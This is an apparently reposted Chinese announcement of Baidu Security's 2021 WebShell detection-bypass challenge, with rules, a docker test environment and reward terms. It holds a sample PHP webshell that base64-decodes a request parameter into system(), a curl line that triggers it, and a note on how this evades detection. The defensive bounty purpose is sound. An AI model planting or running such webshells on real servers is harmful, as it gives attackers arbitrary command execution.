百度安全WebShell挑战赛即将开启!
WebShell,是一种可以在Web服务器上执行脚本或者命令的后门,外部入侵者可通过入侵网站上传WebShell后获得服务器的执行操作权限,比如执行系统命令、窃取用户数据、删除Web页面、修改主页等一系列的操作,其危害不言而喻。
那么,一款高查杀率、高性能、准确度高的WebShell检测工具就极为重要。
百度安全WebShell检测引擎采用先进的动态监测技术,结合多种安全检测引擎,已面向行业服务多年,现诚邀各位业界同仁前来进行绕过挑战!
百度安全WebShell挑战赛
1、挑战时间
2021年4月19日11时-4月25日24时
2、挑战规则
(1)上传PHP WebShell至检测引擎http://webshell.baidu.com/ ,验证其能否绕过检测
(2)绕过检测引擎的WebShell,经测试能够在官方给出的PHP运行环境中稳定运行
(3)提交绕过报告至case
PHP运行环境:
# 拉取docker环境
docker pull openrasp/php-webshell-test:latest
# web目录位于: /usr/share/nginx/html ,为方便测试可以挂载到本机目录
# 运行镜像
docker run -it -p 8888:80 -v /本机测试目录:/usr/share/nginx/html openrasp/php-webshell-test:latest
# 在挂载的目录写入需要测试的php webshell文件,访问本机8888端口对应文件即可测试
3、case提交规范
(1)提交case至BSRC官网,地址https://bsrc.baidu.com
(2)提交BSRC时必须勾选活动【WebShell挑战赛】,漏洞名称以"【WebShell挑战赛】"开头
(3)提交BSRC内容:WebShell文件源代码+完整有效的curl利用方式+成功截图+绕过原理或绕过思路
注:WebShell文件源代码,源代码较大可以以附件形式提交
完整有效的curl利用方式,例如:
curl 'http://127.0.0.1/shell.php?cmd=id
(4)case提交示例:
源代码
<?php
$a = base64_decode ($_GET['cmd']);
system($a);
利用方法
curl "http://127.0.0.1/shell.php?cmd=`echo whoami | base64`"
whoami为要执行的命令
原理说明
通过base64解码绕过system函数的参数敏感字符检测
4、成功绕过case判定标准
WebShell指可以通过控制对该文件的HTTP请求参数(包括但不限于 GET/POST/HTTP Header方式) 实现执行任意代码或命令,如eval($_POST['code']) , system($_GET['cmd'])
5、以下类型的绕过case被判定无效
(1)通过大量占用系统资源实现的检测绕过
(2)通过多个PHP文件组合实现的绕过
(3)硬编码命令,如system('id');
(4)WebShell不能稳定触发,或是依赖于非默认的特定环境等
6、重复case判定标准
按照WebShell的原理,我们将webshell的执行分为数据输入、数据传递、数据执行三个阶段,例如以下WebShell:
<?php
system(base64_decode ($_POST['cmd']));
读取POST数组为数据输入阶段,base64解码为数据传递阶段,system为数据执行阶段,对于在同一阶段使用相似原理实现绕过的case,或是绕过引擎同一个检测点的case,我们将视情况判定为重复。
7、奖励规则
对于每个不重复的有效绕过case,奖励税后1000元,折合200安全币,但该积分不参与其他活动,包括但不限于月度奖励、翻倍活动、积分累计活动等。
8、其他注意事项
(1)禁止对本站使用DDOS、扫描或其他方式攻击
(2)禁止使用大量样本对引擎进行fuzz测试
(3)不得私自公开绕过技巧及样本
百度安全应急响应中心
百度安全应急响应中心,简称BSRC,是百度致力于维护互联网健康生态环境,保障百度产品和业务线的信息安全,促进安全专家的合作与交流,而建立的漏洞收集以及应急响应平台。地址:https://bsrc.baidu.com
长按关注
关注公众号:拾黑(shiheibook)了解更多
[广告]赞助链接:
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/
随时掌握互联网精彩
- 1 习近平会见马来西亚总理安瓦尔 7959802
- 2 美联储宣布降息25个基点 7958047
- 3 徐若瑄承认患癌:一度无法接受 7835978
- 4 微视频|我的名字 7732835
- 5 女子11元拍到海景房 险被老公拒收 7673736
- 6 大学生夜骑的风刮到了济南 7542218
- 7 普京祝贺特朗普当选美国总统 7499064
- 8 同行喊话晓华:把美发行业搞完了 7340633
- 9 网友疑似过敏 发现蘑菇在释放孢子 7206176
- 10 钱天一3比0横扫伊藤美诚 7195616